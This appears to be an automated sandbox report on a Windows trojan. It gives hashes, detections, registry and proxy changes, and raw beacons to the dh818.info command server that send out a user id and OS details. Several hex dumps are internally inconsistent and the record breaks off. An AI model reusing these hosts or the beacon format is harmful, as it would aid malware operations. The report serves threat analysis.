Analysis Date2013-11-05 15:06:07
MD5487e7db60dac93954970939bd60a8fa1
SHA1a148137d5280540c42aad254d74447888f60c5ab

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 8d3795900617ce1bf420fa24216a58b0 sha1: 6337baa0683e82ab4a6ecc1f8780281b813a593e size: 53248
Section.rsrc md5: d6a81442aa12bdebc0d8b8e2dcb9ccc8 sha1: 2649283c0fedfa5a29bf6d9eae36e6bc4221c76b size: 3584
Timestamp2011-04-24 13:43:05
PackerMicrosoft Visual C++ v6.0
PEhashcf1d6e153f4a6afb5cff44629cb17b26bbfe5a77
AVmsseTrojan:Win32/Popureb.C
AVavgGeneric22.ARCC
AVaviraTR/StartPage.RR

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FilePHYSICALDRIVE0
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\PulgFile.log
Creates File\Device\Afd\Endpoint
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexIE_2011_Mutex
Winsock DNS2.dh818.info
Winsock DNS1.dh818.info

Network Details:

DNS1.dh818.info
Type: A
82.98.86.174
DNS2.dh818.info
Type: A
82.98.86.174
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1033 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1034 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1035 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1036 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1037 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1038 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1039 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1040 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1041 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1042 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1043 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1044 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1045 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1046 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1047 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1048 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1049 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1050 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1051 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1052 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1053 ➝ 82.98.86.174:83
Flows TCP192.168.1.1:1054 ➝ 82.98.86.174:83

Raw Pcap
0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a                                    .

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3364 33302032 36373036 31373520   ..3d30 26706175 
0x00000150 (00336)   36393634 33643331 20202030 58502666   69643d31   0XP&f
0x00000160 (00352)   793d3026 70617569 643d310a            y=0&pauid=1.

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3364 33302032 36373036 31373520   ..3d30 26706175 
0x00000150 (00336)   36393634 33643331 20202030 58502666   69643d31   0XP&f
0x00000160 (00352)   793d3026 70617569 643d310a            y=0&pauid=1.

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
